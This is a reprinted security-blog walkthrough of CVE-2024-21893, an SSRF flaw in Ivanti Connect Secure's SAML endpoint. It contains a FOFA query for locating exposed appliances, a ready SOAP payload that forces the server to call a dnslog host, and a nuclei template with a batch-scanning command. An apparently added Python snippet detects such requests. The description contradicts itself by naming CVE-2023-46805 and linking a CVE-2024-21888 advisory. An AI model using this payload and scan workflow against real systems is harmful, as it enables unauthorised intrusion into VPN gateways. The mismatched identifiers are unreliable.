CVE-2024-21893

admin, 2024-02-08 01:01:27

01 Vulnerability Name

Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution

02 Affected Products

A server-side request forgery vulnerability exists in the SAML component of Ivanti Connect Secure (9.x, 22.x), Ivanti Policy Secure (9.x, 22.x) and Ivanti Neurons for ZTA.

Note: this vulnerability has already been weaponized by attackers for large-scale worm-style propagation, ransomware and cryptomining; we recommend attending to it and patching immediately.


03 Vulnerability Description

In 2024 the CVE-2023-46805 Ivanti Pulse Connect Secure VPN SSRF-to-remote-code-execution vulnerability was disclosed on the Internet. An attacker can craft a malicious request that triggers the SSRF and, combined with related functionality, achieves remote code execution.

Reference: https://forums.ivanti.com/s/article/CVE-2024-21888-Privilege-Escalation-for-Ivanti-Connect-Secure-and-Ivanti-Policy-Secure?language=en_US

04 FOFA Search Query

body="welcome.cgi?p=logo"


05 Reproduction

SSRF is usually reproduced with a DNSlog service: send the following request to the test target, which makes the server fetch the dnslog URL.

POST /dana-ws/saml20.ws HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 792
Accept-Encoding: gzip

<?xml version="1.0" encoding="UTF-8"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#">
      <ds:SignedInfo>
        <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/>
        <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/>
      </ds:SignedInfo>
      <ds:SignatureValue>qwerty</ds:SignatureValue>
      <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/2000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#">
        <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/>
        <ds:X509Data/>
      </ds:KeyInfo>
      <ds:Object></ds:Object>
    </ds:Signature>
  </soap:Body>
</soap:Envelope>

The access record then appears in the dnslog panel.


Reproduction complete.
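From the defender's side, the behaviour the DNSlog test above relies on is the appliance dereferencing a ds:RetrievalMethod URI supplied by an unauthenticated client. The following Python is an added example (not code from the original post, Ivanti or nuclei) that inspects a captured request to the SAML endpoint and flags any RetrievalMethod URI pointing off-document; the vpn.example.test and callback.example.invalid hosts are constructed placeholders.

```python
import xml.etree.ElementTree as ET
from urllib.parse import urlparse

DSIG = "{http://www.w3.org/2000/09/xmldsig#}"
SAML_ENDPOINT = "/dana-ws/saml20.ws"

def external_retrieval_uris(xml_body, allowed_hosts=()):
    """Return ds:RetrievalMethod URIs that would make the server fetch something
    outside the document. Same-document references ("#id") are normal in XML-DSig
    and are skipped; any other URI whose host is not explicitly allowed is returned.
    Unparseable XML yields one "<malformed-xml>" entry so a broken payload is
    never silently treated as clean."""
    try:
        root = ET.fromstring(xml_body)
    except ET.ParseError:
        return ["<malformed-xml>"]
    flagged = []
    for node in root.iter(DSIG + "RetrievalMethod"):
        uri = node.get("URI", "")
        if uri == "" or uri.startswith("#"):
            continue
        host = urlparse(uri).hostname  # None for file:// or relative URIs
        if host is None or host.lower() not in allowed_hosts:
            flagged.append(uri)
    return flagged

def inspect_request(raw, allowed_hosts=()):
    """For a raw HTTP request, return (is_suspicious, flagged_uris) if it is a
    POST to the SAML endpoint; any other request returns (False, [])."""
    head, _, body = raw.partition(b"\r\n\r\n")
    if not body:  # tolerate captures that use bare LF line endings
        head, _, body = raw.partition(b"\n\n")
    parts = head.split(b"\n", 1)[0].decode("latin-1").split()
    if len(parts) < 2 or parts[0] != "POST" or parts[1] != SAML_ENDPOINT:
        return False, []
    hits = external_retrieval_uris(body, allowed_hosts)
    return bool(hits), hits

# Constructed samples, not traffic from the original post: the first mirrors the
# post's payload shape with a placeholder callback host, the second is benign.
SSRF_REQUEST = (
    b"POST /dana-ws/saml20.ws HTTP/1.1\r\nHost: vpn.example.test\r\n\r\n"
    b'<?xml version="1.0" encoding="UTF-8"?><soap:Envelope '
    b'xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body>'
    b'<ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"><ds:KeyInfo>'
    b'<ds:RetrievalMethod URI="http://callback.example.invalid/"/><ds:X509Data/>'
    b"</ds:KeyInfo></ds:Signature></soap:Body></soap:Envelope>"
)
BENIGN_REQUEST = SSRF_REQUEST.replace(b'"http://callback.example.invalid/"', b'"#signing-cert"')
```

The same check can be run over a WAF or proxy capture of POSTs to /dana-ws/saml20.ws; a legitimate IdP exchange should only ever carry same-document references here.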

06 Batch Scanning POC

nuclei officially released a POC last night, so I used it directly. The nuclei POC file contents are as follows:

id: CVE-2024-21893

info:
  name: Ivanti SAML - Server Side Request Forgery (SSRF)
  author: DhiyaneshDk
  severity: high
  description: |
    A server-side request forgery vulnerability in the SAML component of Ivanti Connect Secure (9.x, 22.x) and Ivanti Policy Secure (9.x, 22.x) and Ivanti Neurons for ZTA allows an attacker to access certain restricted resources without authentication.
  reference:
    - https://attackerkb.com/topics/FGlK1TVnB2/cve-2024-21893/rapid7-analysis
    - https://www.assetnote.io/resources/research/ivantis-pulse-connect-secure-auth-bypass-round-two
    - https://github.com/advisories/GHSA-5rr9-mqhj-7cr2
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N
    cvss-score: 8.2
    cve-id: CVE-2024-21893
    cwe-id: CWE-918
    cpe: cpe:2.3:a:ivanti:connect_secure:9.0:-:*:*:*:*:*:*
  metadata:
    vendor: ivanti
    product: connect_secure
    shodan-query: html:"welcome.cgi?p=logo"
  tags: cve,cve2024,kev,ssrf,ivanti

http:
  - raw:
      - |
        POST /dana-ws/saml20.ws HTTP/1.1
        Host: {{Hostname}}

        <?xml version="1.0" encoding="UTF-8"?>
        <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
          <soap:Body>
            <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#">
              <ds:SignedInfo>
                <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/>
                <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/>
              </ds:SignedInfo>
              <ds:SignatureValue>qwerty</ds:SignatureValue>
              <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/2000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#">
                <ds:RetrievalMethod URI="http://{{interactsh-url}}"/>
                <ds:X509Data/>
              </ds:KeyInfo>
              <ds:Object></ds:Object>
            </ds:Signature>
          </soap:Body>
        </soap:Envelope>

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol  # Confirms the DNS Interaction
        words:
          - "dns"

      - type: word
        part: body
        words:
          - '/dana-na/'
          - 'WriteCSS'
        condition: and
# digest: 4a0a00473045022100fefc6637185b28b4af8b503bdb7b89401fc591c34cb6082b20322ac0f1ad67c8022027e634cbc733ad699766de6d8eb8f22b6368d0b663cd28cbd957eaaf37f51838:922c64590222798bb761d5b6d8e72950

Run the POC:

nuclei.exe -t mypoc/cve/CVE-2024-21893.yaml -l data/CVE-2024-21893.txt


07 Remediation

Update the affected system or software to the latest version to fix the vulnerability.

Originally published on the WeChat official account AI与网安: CVE-2024-21893

Reprinted by CN-SEC中文网: http://cn-sec.com/archives/2474155.html
